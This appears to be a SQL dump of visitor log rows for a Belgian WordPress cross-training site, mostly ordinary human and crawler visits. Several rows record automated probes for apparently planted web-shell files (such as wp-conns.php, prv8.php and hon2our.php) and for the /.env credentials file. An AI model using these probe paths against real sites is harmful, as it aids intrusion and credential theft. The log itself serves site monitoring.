(76605, 1499076684.052365, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76606, 1499076701.322720, 533387461, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-includes/class.wp.php?ok', '', 'Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1'),
(76607, 1499076702.236941, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76608, 1499076703.134450, 3250520646, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(76609, 1499076722.865246, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76610, 1499076742.480925, 3250520646, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76611, 1499080929.318819, 2679407696, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.com/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-J510FN/J510FNXXU2AQA2 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76612, 1499080932.144631, 2679407696, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-J510FN/J510FNXXU2AQA2 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76613, 1499084094.065951, 2783008843, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),
(76614, 1499084097.402904, 2783008843, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),
(76615, 1499088986.793763, 1306279988, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/cache.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76616, 1499089511.600127, 872401474, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/.env', '', 'Mozilla/5.0 (Linux; Android 4.1.2; SGH-I727R Build/JZO54K) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Mobile Safari/537.22'),
(76617, 1499091379.882646, 872366560, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76618, 1499093508.213331, 3475901880, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76619, 1499093826.768622, 2637637538, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76620, 1499094928.780038, 1055593041, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G935F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76621, 1499094930.680128, 1055593041, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G935F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76622, 1499105324.308314, 1255137841, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/wp-conns.php', 'http://crosstrainingcenter.be/wp-content/themes/wp-conns.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76623, 1499115614.646728, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76624, 1499115615.763336, 1123632645, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76625, 1499120495.074443, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76626, 1499123974.966389, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76627, 1499125525.991379, 621375780, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76628, 1499125529.139611, 621375750, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76629, 1499128873.560317, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76630, 1499137842.460787, 3427775502, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)'),
(76631, 1499142589.008957, 2509959072, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/search?q=cross+training&hl=fr&oq=cross+tr&gs_l=mobile-heirloom-serp.1.0.0l5.2201.4438.0.5543.9.8.0.1.1.0.141.709.5j2.7.0....0...1.1.34.mobile-heirloom-serp..1.8.745.Vg1p6HYEgCA', 'Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2876 Mobile Safari/537.35+'),
(76632, 1499142590.904892, 2509959072, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2876 Mobile Safari/537.35+'),
(76633, 1499142599.478154, 2509959072, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2876 Mobile Safari/537.35+'),
(76634, 1499142633.326676, 2509959072, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2876 Mobile Safari/537.35+'),
(76635, 1499142660.710935, 2509959072, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2876 Mobile Safari/537.35+'),
(76636, 1499142671.057196, 2509959072, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2876 Mobile Safari/537.35+'),
(76637, 1499149695.849722, 1538655055, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(76638, 1499149696.680659, 1538655055, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(76639, 1499149714.416267, 1538655055, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(76640, 1499149715.225997, 1538655055, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(76641, 1499149715.537968, 1538655055, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(76642, 1499149722.008408, 1538655055, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(76643, 1499153331.762611, 3475901816, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76644, 1499155039.627499, 3427775502, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)'),
(76645, 1499155674.828002, 2637637378, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76646, 1499161432.817455, 1837384990, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76647, 1499161433.950526, 1837384990, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76648, 1499161615.711079, 1837384990, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76649, 1499161631.784376, 1837384990, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76650, 1499161657.662536, 1837384990, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76651, 1499161783.515060, 1837384990, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76652, 1499162190.051361, 1054012869, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(76653, 1499163144.461805, 3024883614, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76654, 1499167476.487908, 3154492423, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76655, 1499167477.103268, 3154492423, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76656, 1499167477.581707, 3154492423, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76657, 1499167478.130426, 3154492423, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76658, 1499167478.647436, 3154492423, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76659, 1499167479.343290, 3154492423, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76660, 1499167479.910630, 3154492423, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76661, 1499167480.687836, 3154492423, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76662, 1499167481.328815, 3154492423, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76663, 1499167481.960839, 3154492423, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76664, 1499167482.662939, 3154492423, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76665, 1499168107.813962, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(76666, 1499168708.856166, 3281714082, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/prettyphoto/pretyphoto.php', 'http://www.crosstrainingcenter.be/wp-content/plugins/prettyphoto/pretyphoto.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(76667, 1499169909.918811, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76668, 1499169910.375927, 1123632645, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76669, 1499193574.780854, 876162633, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/2.0; +http://cliqz.com/company/cliqzbot)'),
(76670, 1499193577.456445, 876162633, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; Cliqzbot/2.0; +http://cliqz.com/company/cliqzbot)'),
(76671, 1499196459.087272, 1998438315, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/prv8.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76672, 1499196891.725135, 3475901747, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76673, 1499199628.999036, 2637637391, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76674, 1499200461.392595, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(76675, 1499200464.911936, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(76676, 1499200469.679615, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(76677, 1499200474.549477, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(76678, 1499200479.436867, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(76679, 1499200493.628371, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(76680, 1499200507.535655, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(76681, 1499200512.457023, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(76682, 1499203898.049972, 3475901816, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76683, 1499204428.997227, 3475901747, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76684, 1499204429.733164, 3475901747, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76685, 1499206617.203878, 1439267802, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; U; Android 4.4.2; fr-be; SM-T315 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(76686, 1499206635.864965, 1439267802, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; U; Android 4.4.2; fr-be; SM-T315 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(76687, 1499206643.853491, 1439267802, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; U; Android 4.4.2; fr-be; SM-T315 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30'),
(76688, 1499206965.785713, 676177698, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76689, 1499206966.746794, 676177698, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76690, 1499207596.908294, 3652607679, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://crosstrainingcenter.be/contact', 'Go-http-client/1.1'),
(76691, 1499211878.719754, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76692, 1499221373.043093, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76693, 1499232279.238966, 1123631811, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76694, 1499232280.490748, 1123631626, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76695, 1499232283.953691, 3475901747, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76696, 1499236017.178927, 3475901747, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76697, 1499236428.987576, 1837384990, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76698, 1499236431.380613, 1837384990, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76699, 1499237137.029407, 1837384990, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76700, 1499237138.084059, 1837384990, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76701, 1499237159.002651, 1837384990, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76702, 1499237174.498014, 1837384990, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76703, 1499237190.271223, 1837384990, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76704, 1499237609.795151, 1837384990, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76705, 1499238399.768760, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76706, 1499238694.367825, 1209777137, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/images/hon2our.php', 'http://crosstrainingcenter.be/wp-includes/images/hon2our.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76707, 1499238718.120335, 1374822686, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A520F/A520FXXU1AQD3 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76708, 1499238719.477758, 1374822686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A520F/A520FXXU1AQD3 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76709, 1499238724.649469, 1374822686, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A520F/A520FXXU1AQD3 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
